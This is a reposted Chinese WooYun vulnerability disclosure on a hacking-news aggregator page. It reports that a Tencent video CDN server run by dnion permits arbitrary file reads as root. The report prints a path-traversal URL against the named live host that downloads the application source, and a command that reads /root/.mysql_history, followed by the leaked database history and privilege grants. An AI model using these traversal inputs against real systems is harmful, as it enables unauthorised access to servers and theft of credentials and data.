记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

腾讯某站配置不当可导致部分地区腾讯视频播放源损坏

2015-04-20 19:35

http://transport.dnion.com/index.zul

这个站是腾讯使用的dnion cdn服务 主要用来做视频cdn分发和直播rtmp流分发

具体负责的地区不明确。

1.jpg





由于服务配置不当 导致任意文件读取 root权限



Snip20150306_80.png





读取history找到大量配置文件

漏洞证明:

Snip20150306_81.png





/var/local/apache-tomcat-6.0.35/logs/tencent-info.log

这是分发日志

Snip20150306_82.png





读web.xml找到数据库 并成功外连



Snip20150306_83.png







800多万视频来源地址



Snip20150306_84.png



Snip20150306_86.png







源码可下载 分发接口泄露 可以恶意分发

http://transport.dnion.com:1863/../../../../../../../var/local/apache-tomcat-twodb/webapps/videoTransPort2.01_online_1.0.tar.gz



本机3306开放 可以mysql外连



code 区域
perl curl.pl transport.dnion.com:1863 /root/.mysql_history

show databases

;

GRANT ALL PRIVILEGES ON ^' WITH GRANT OPTION;

GRANT ALL PRIVILEGES ON *1" IDENTIFIED BY 'TH GRANT OPTION;

q

;

show databasesl

show databases;

use qqlive

ll

;

show tables;

select * from live_cache;

show processlist;

\q



history可以读到密码 可成功连接

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-099916

阅读:84450 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“腾讯某站配置不当可导致部分地区腾讯视频播放源损坏”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词